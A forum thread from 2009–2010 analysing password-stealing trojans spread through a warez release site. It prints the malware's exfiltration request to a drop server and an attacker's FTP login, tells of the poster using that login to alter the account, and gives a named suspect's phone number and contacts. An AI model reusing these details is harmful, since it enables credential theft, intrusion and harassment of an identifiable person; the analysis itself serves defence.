| Author | Message |
|---|
Vektor
2009-06-12
20:52:22
|
| Quote | It is a well known fact that rlslog.net is spreading iStealer trojans which collect all locally stored passwords. Last known trojan was saving a file called u16event.dat and uploaded it via FTP to sv4.altushost.com . Usually a NSIS installer extracts 2 executable files, and one of them is the trojan (known names used are Server 89.exe, Iexplore.exe and Firefox.exe).
Now that FTP account no longer works. So I assumed they are spreading an updated trojan, and I was right. The method is the same, a NSIS installer extracts in Temp directory 2 executables, one named by installer's name and the other is Fizezilla.exe (which is currently not detected by any antivirus). This trojan no longer uploads to FTP.
The trojan is packed with a modified VBCrypt (local path to encryption program's project: C:\A\oPWouwTmTKi.vbp / C:\A\tAwDaPtcNxjaUmGF.pdb ), it decrypts and executes a modified variant of iStealer, which collects all locally stored passwords and calls http://warezbb.info/Dont_Bother/index.php?action=add, with the following parameters:- a = resource type (eg.: 8 = no-ip, 10 = firefox password)
- u = URL
- l = login name
- p = password
- c = computer name
For example, for http://www.example.com , user: user, password: password, computer name: computer, the trojan would send a HTTP GET request for the following URL: http://warezbb.info/Dont_Bother/index.php?action=add&a=10&u=%68%74%74%70%3A%2F%2F%77%77%77%2E%65%78%61%6D%70%6C%65%2E%63%6F%6D&l=%75%73%65%72&p=%70%61%73%73%77%6F%72%64&c=%63%6F%6D%70%75%74%65%72 (where "a" is 10 for Firefox passwords, "u" is the hex escaping for "http://www.example.com", etc.). For each password the trojan makes a request like this. Of course, warezbb.info is also hosted by altushost (91.214.44.123 = eu25.altushost.com).
| warezbb.info wrote: | Domain ID:D26912061-LRMS
Domain Name:WAREZBB.INFO
Created On:15-Nov-2008 22:10:18 UTC
Last Updated On:02-Jun-2009 06:30:42 UTC
Expiration Date:15-Nov-2009 22:10:18 UTC
Sponsoring Registrar:Dynadot LLC (R259-LRMS)
Status:CLIENT TRANSFER PROHIBITED
Registrant ID:CP-47333
Registrant Name:Shahrukh c/o Dynadot Privacy
Registrant Organization:
Registrant Street1:PO Box 701
Registrant Street2:
Registrant Street3:
Registrant City:San Mateo
Registrant State/Province:CA
Registrant Postal Code:94401
Registrant Country:US
Registrant Phone:+1.6505851961
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:privacy@dynadot.com
Admin ID:CP-47333
Admin Name:Shahrukh c/o Dynadot Privacy
Admin Organization:
Admin Street1:PO Box 701
Admin Street2:
Admin Street3:
Admin City:San Mateo
Admin State/Province:CA
Admin Postal Code:94401
Admin Country:US
Admin Phone:+1.6505851961
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin Email:privacy@dynadot.com
Billing ID:CP-47333
Billing Name:Shahrukh c/o Dynadot Privacy
Billing Organization:
Billing Street1:PO Box 701
Billing Street2:
Billing Street3:
Billing City:San Mateo
Billing State/Province:CA
Billing Postal Code:94401
Billing Country:US
Billing Phone:+1.6505851961
Billing Phone Ext.:
Billing FAX:
Billing FAX Ext.:
Billing Email:privacy@dynadot.com
Tech ID:CP-47333
Tech Name:Shahrukh c/o Dynadot Privacy
Tech Organization:
Tech Street1:PO Box 701
Tech Street2:
Tech Street3:
Tech City:San Mateo
Tech State/Province:CA
Tech Postal Code:94401
Tech Country:US
Tech Phone:+1.6505851961
Tech Phone Ext.:
Tech FAX:
Tech FAX Ext.:
Tech Email:privacy@dynadot.com
Name Server:NS5.ALTUSHOST.COM
Name Server:NS6.ALTUSHOST.COM |
|
| ns5.altushost.com wrote: | warezbb.info. SOA ns5.altushost.com shahrukh.it.live.com. (2009060202 86400 7200 3600000 86400)
warezbb.info. MX 0 warezbb.info
warezbb.info. NS ns5.altushost.com
warezbb.info. NS ns6.altushost.com
warezbb.info. A 91.214.44.123
cpanel A 91.214.44.123
ftp A 91.214.44.123
localhost A 127.0.0.1
mail CNAME warezbb.info
webdisk A 91.214.44.123
webmail A 91.214.44.123
whm A 91.214.44.123
www CNAME warezbb.info
warezbb.info. SOA ns5.altushost.com shahrukh.it.live.com. (2009060202 86400 7200 3600000 86400) |
|
The mail addresses shahrukh.it@live.com and shahrukh.it@gmail.com were used to register accounts on other forums by users who were selling rapidshare accounts. Registered nicknames: farrukh rkr , shahrukh_pro , shahrukh khalid , dr00n ( rlslog.net staff ) , devilwing , etc.
http://www.webmasterforums.com/buy-sell-ad-space/16787-bulk-rapidshare-seller-offical-legit.html
, user: shahrukh_pro wrote: | Hey guys
I Knw m new here but m a trsuted seller but only in bulks
Legit Accounts One month Made from points
BULK $4.5 Per Month
or pr 10k
Price may Differ for BULK
Thankx
Shahrukh.it@live.com Add me msn |
|
| http://www.bzimage.org/showthread.php?t=8534 , user: shahrukh_pro wrote: | Hello Guys
I am a Rapidshare Seller Also Available in bulk minimum 5 accounts
one month fresh Created With points $5 Per month Accounts.
shahrukh.it@live.com
only Bulk buyers |
|
| http://www.domainnameforumz.com/showthread.php?t=5382 , user: shahrukh_pro wrote: | m Selling it Buddy 1 Month just for $5 shahrukh.it@live.com
add me if u want more |
|
| http://www.warezscene.org/archive/index.php/t-324816.html , user: BBproz wrote: | Hey Guys
I Got 1200+ Rapidshare Accounts And i am Giving That For a Simple Task
First 10 Ppls Will Get 6 to 8 Months Accounts So Just Replay Here For The Task And Get Accounts :) |
|
This is same dr00n as the one regged on many blogs and forums that have rapidshare links:
| http://www.pakgamers.com/forums/other/22818-ipod-shuffle-2.html , user: dr00n wrote: | OK bro Max i can give is 3k
If yes then sms me
03212879757
shahrukh
i live in karachi clifton
i can give 3000 but urgent sms me plz
03212879757 |
|
| http://www.wiredpakistan.com/forums/viewtopic.php?id=2874 , shahrukh_pro wrote: | Hey Guys M selling premium Rapidshare accounts m selling them very cheap shared accounts
Rules:
The account will be sold to 2 persons and u cant change the password..
6 Months Account only for 1000 (8 Months Acc)
3 Months Account for 600 (4 Months Acc)
1 Month only for 250 (45 Days Acc)
Anybody Interested Contact Me..
03212879757 Shahrukh
EDITED PACKAGES
...
m live in karachi
but it doesnt matter where do i live u have to pay in the form of mobile cards |
|
____________________
|
|
Vektor
2009-06-13
15:01:03
|
| Quote | Another trojan that can be found on archives posted on rlslog.net is a password stealer written in Visual Basic that always comes with MSINET.OCX (usually with hidden attribute). If you see MSINET.OCX in a downloaded archive with some executable files in it, don't execute anything and delete that archive.
While the other trojan searches only for Process Monitor and Ethereal / Wireshark window class names, this one searches also for WMWARE, VBOX, Sandboxie, Anubis, ThreatExpert, CWSandbox and JoeBox (http://www.opensc.ws/snippets/3558-detect-5-different-sandboxes.html). Trojan spreader's local path to this VB project: C:\Stealer\Server\Project1.vbp .
This trojan makes a text file with the following format:
| Code: | --------------------------------------------------
Protocol:
Username:
Password:
--------------------------------------------------
HALF LIFE KEY:
COUNTER STRIKE KEY:
DREAMWEAVER ULTRA DEV4 KEY:
SYMANTEC KEY:
ADOBE PHOTOSHOP 7.0 KEY:
NERO BURNING ROM 5 KEY:
ULEAD PHOTOIMPACT 7.0 KEY:
SIBELIUS 2 KEY:
MIRC USERNAME:
MIRC KEY:
WINZIP NAME:
WINZIP KEY:
UT2003 KEY:
THE SIMS KEY:
THE SIMS HOT DATE KEY:
THE SIMS HOUSE PARTY KEY:
THE SIMS UNLEASHED DATE KEY:
THE SIMS VACATION DATE KEY:
PROJECT IGI 2 RETAIL KEY:
BATTLEFIELD 1942 KEY:
RAINBOW SIX III RAVENSHIELD KEY:
THE GLADIATORS KEY:
NEED FOR SPEED HOT PURSUIT 2 KEY:
FIFA 2003 KEY:
C&C GENERALS KEY:
RED ALERT 2 KEY:
TIBERIAN SUN KEY:
--------------------------------------------------
NO-IP User:
NO-IP Pass:
--------------------------------------------------
Pidgin Info:
--------------------------------------------------
FileZilla Info:
--------------------------------------------------
Firefox Data:
--------------------------------------------------
Yahoo User:Text3
Yahoo Pass:Text4
--------------------------------------------------
|
|
The text file is named by local computer name and is uploaded to ftp://jackfruit.justfree.com using the account for jackfruit with password h870881 (e-mail used to register it: choaschoi@yahoo.com ).
| ftp://jackfruit.justfree.com wrote: | Connect to: (12.06.2009 9:12:40 PM)
hostname=jackfruit.justfree.com
username=jackfruit
startdir=
jackfruit.justfree.com=205.134.162.147
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 13 of 200 allowed.
220-Local time is now 14:11. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 2 minutes of inactivity.
USER jackfruit
331 User jackfruit OK. Password required
PASS ***********
230-User jackfruit has group access to: vhosts
230-OK. Current restricted directory is /
230 4 Kbytes used (0%) - authorized: 2048000 Kb
SYST
215 UNIX Type: L8
FEAT
211-Extensions supported:
EPRT
IDLE
MDTM
SIZE
REST STREAM
MLST type*;size*;sizd*;modify*;UNIX.mode*;UNIX.uid*;UNIX.gid*;unique*;
MLSD
TVFS
ESTP
PASV
EPSV
SPSV
ESTA
AUTH TLS
PBSZ
PROT
211 End.
Connect ok!
PWD
257 "/" is your current location
Get directory
TYPE A
200 TYPE is now ASCII
PASV
227 Entering Passive Mode (205,134,162,147,52,21)
LIST
150 Accepted data connection
Download
Waiting for server...
226-Options: -l
226 2 matches total
DELE VIC-PC.txt
250-2 Kbytes used (0%) - authorized: 2048000 Kb
250 Deleted VIC-PC.txt |
|
Since the password is hardcoded in trojan .exe, a password change would prevent it to upload anything to that FTP. So I changed the password for it (as long as the password is not h870881, no trojans can upload anything to it). |
|
[-TE-]-Methodman
2009-06-13
16:35:13
|
|
Vektor
2010-12-09
16:05:28
|
| Quote | New host for logs sent by trojans posted on rlslog.net: http://genuinekeyz.com/ (213.5.66.161 = hosted-by.altushost.com), each directory has a php logger used by a different trojan.
| genuinekeyz.com wrote: | Index of /
Name Last modified Size Description
$ush 02-Sep-2010 12:30 -
Hax0r 14-Sep-2010 14:30 -
Jmr0x 12-Sep-2010 16:40 -
NuW@n 27-Sep-2010 13:19 -
X91i 14-Sep-2010 14:30 -
cgi-bin 29-Sep-2010 19:39 -
ftp 09-Dec-2010 13:08 -
rcxxteer 17-Nov-2010 14:27 -
s@nsh 27-Sep-2010 21:05 -
xxxyxxx 27-Sep-2010 14:09 -
Proudly Served by LiteSpeed Web Server at genuinekeyz.com Port 80 |
|
Desperate attempt from same hosted-by.altushost.com) to spam this website:
| 79.142.64.19 = hosted-by.altushost.com wrote: | | Code: | [11:42] <-TE-> Web report from IP: 79.142.64.19 ( snkpidz ):
"ZVGyX1 <a href="http://fgdrkiehyebh.com/">fgdrkiehyebh</a>, [url=http://tygsodnozayu.com/]tygsodnozayu[/url], [link=http://nvgoxsubviop.com/]nvgoxsubviop[/link], http://szhcsrguujlm.com/"
[11:42] <-TE-> Web report from IP: 79.142.64.19 ( bjypcb ):
"jhSvEs <a href="http://jgfujmitzbgf.com/">jgfujmitzbgf</a>, [url=http://otocynzarxuq.com/]otocynzarxuq[/url], [link=http://jdwhcekkrhqv.com/]jdwhcekkrhqv[/link], http://saxjexabzpec.com/"
[11:47] <-TE-> Web report from IP: 79.142.64.19 ( bzpnooudy ):
"AvNWC0 <a href="http://nhgkkruaanzi.com/">nhgkkruaanzi</a>, [url=http://tvoxfaltnilx.com/]tvoxfaltnilx[/url], [link=http://sopxvbqagunz.com/]sopxvbqagunz[/link], http://tcwdbaypyxzc.com/"
[11:47] <-TE-> Web report from IP: 79.142.64.19 ( deacwfs ):
"eqCtOr <a href="http://dqxmxzrjnbry.com/">dqxmxzrjnbry</a>, [url=http://mqlclgipszbc.com/]mqlclgipszbc[/url], [link=http://tfeazpixszcd.com/]tfeazpixszcd[/link], http://dgivfccbmatu.com/"
[11:52] <-TE-> Web report from IP: 79.142.64.19 ( hokzoblqr ):
"hEJGA8 <a href="http://isssfggrhzef.com/">isssfggrhzef</a>, [url=http://zpougirxcydm.com/]zpougirxcydm[/url], [link=http://zxpiyovraqdo.com/]zxpiyovraqdo[/link], http://otxkueakvoql.com/"
[11:53] <-TE-> Web report from IP: 79.142.64.19 ( fsrvfpkrlw ):
"QjquHE <a href="http://oswdqyquaneh.com/">oswdqyquaneh</a>, [url=http://zldfsovgixrx.com/]zldfsovgixrx[/url], [link=http://ftxfygnqeprq.com/]ftxfygnqeprq[/link], http://wzvygxjuztez.com/"
[12:00] <-TE-> Web report from IP: 79.142.64.19 ( htepqwntaf ):
"rbZj9i <a href="http://otbytyucwmrr.com/">otbytyucwmrr</a>, [url=http://acdnzrxgqmqf.com/]acdnzrxgqmqf[/url], [link=http://dmoxjigrcbon.com/]dmoxjigrcbon[/link], http://vicfoupnvkmu.com/" |
|
|
|
| nemesis.te-home.net wrote: | [2010-12-09 01:44:21] 79.142.64.19 POST /report?return=/index.html?contact=2 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" http://nemesis.te-home.net/index.html?contact
...
[2010-12-09 02:13:20] 79.142.64.19 POST /report?return=/index.html?contact=2 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" http://nemesis.te-home.net/index.html?contact
[2010-12-09 02:13:20] 79.142.64.19 GET /index.html?contact "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" http://nemesis.te-home.net/index.html?contact
[2010-12-09 02:13:20] 79.142.64.19 GET /index.html?contact "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
[2010-12-09 02:13:20] 79.142.64.19 GET /index.html?contact "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" http://nemesis.te-home.net/index.html?contact
...
[2010-12-09 02:24:27] 79.142.64.19 GET /index.html?contact "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
[2010-12-09 02:24:27] 79.142.64.19 POST /report?return=/index.html?contact=2 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" http://nemesis.te-home.net/index.html?contact |
|
Fail. |
|
|
